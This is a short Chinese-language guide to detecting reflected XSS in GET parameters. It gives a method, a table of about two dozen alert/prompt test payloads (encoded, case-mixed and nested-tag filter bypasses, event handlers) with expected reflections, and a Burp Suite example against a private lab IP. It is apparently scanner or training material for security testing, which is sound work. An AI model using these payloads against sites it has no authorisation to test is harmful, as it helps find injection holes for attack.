1) 检测方法:
爬取get页面,将测试向量<script>alert(a1b2c3d4e5)</script>逐个依次代入url参数
返回页面响应码200,并且能在返回页面中检测到字符串<script>alert(a1b2c3d4e5)</script>
2) 测试向量:
注入 | 返回 |
%3E%22%27%3E%3Cscript%3Ealert%289776%29%3C%2Fscript%3E | <script>alert(9776)</script> |
<script>alert(1214)</script> | <script>alert(1214)</script> |
;</script><script>alert(1350)</script> | <script>alert(1350)</script> |
%3Cscript%3Ealert%28514%29%3C%2Fscript%3E | <script>alert(514)</script> |
"/><script>alert(10364)</script> | <script>alert(10364)</script> |
";</script><script>alert(1300)</script> | <script>alert(1300)</script> |
%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%286431%29%3C%2Fscript%3E | <script>alert(6431)</script> |
%22onmouseover%3D%22alert%281101%29%22 | οnmοuseοver="alert(1101)" |
%22%20οnmοuseοver=%22alert%283870%29%22%20 | οnmοuseοver="alert(3870)" |
-->";</script><script>alert(6837)</script> | <script>alert(6837)</script> |
;;"";;alert(3868);; | alert(3868) |
--%3E%3C/script%3E%3Cscript%3Ealert(3880)%3C/script%3E | <script>alert(3880)</script> |
%00--%3E%3C/script%3E%3Cscript%3Ealert(3882)%3C/script%3E | <script>alert(3882)</script> |
%3Cscript%3Ealert(3884)%3C/script%3E | <script>alert(3884)</script> |
%3cimg%20src%3d%22javascript%3aalert(3888)%22%3e | alert(3888) |
%253E%2527%2522%253E%253Cscript%253Ealert%25283907%2529%253C%252Fscript%253E | <script>alert(3907)</script> |
<script>alert(String.fromCharCode(88,83,83))</script> | <script>alert(String.fromCharCode(88,83,83))</script> |
<scRipt>alert(123)</scriPt> | <scRipt>alert(123)</scriPt> |
<s<script>cript>alert(123)</s</script>cript> | <script>alert(123)</script> |
<img src=1 οnerrοr=alert(123)> | <img src=1 οnerrοr=alert(123)> |
<script>prompt(123)</script> | <script>prompt(123)</script> |
"method="POST"><script>alert(123)</script> | "method="POST"><script>alert(123)</script> |
" οnsubmit="alert('123') | " οnsubmit="alert('123') |
3) 示例:
访问链接:http://192.168.2.160/xss_kuazhan/xss_get1.php?username=test
并使用brupsuite抓取数据包请求头
GET /xss_kuazhan/xss_get1.php?username=testHTTP/1.1
Host: 192.168.2.160
User-Agent: Mozilla/5.0 (Windows NT 6.1;WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.160/
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
修改参数username值为username=<script>alert(a1b2c3d4e5)</script>,发送数据包,浏览器弹框显示a1b2c3d4e5